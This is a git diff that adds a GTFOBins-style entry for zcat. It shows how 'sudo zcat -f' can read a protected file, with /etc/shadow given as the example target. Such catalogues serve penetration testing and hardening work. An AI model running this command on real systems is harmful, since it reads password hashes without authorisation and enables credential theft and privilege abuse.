diff --git a/_gtfobins/zcat.md b/_gtfobins/zcat.md new file mode 100644 index 0000000..4141969 --- /dev/null +++ b/_gtfobins/zcat.md @@ -0,0 +1,7 @@ +--- +functions: + sudo: + - code: | + LFILE="/etc/shadow" # or any other file + sudo zcat -f "$LFILE" +---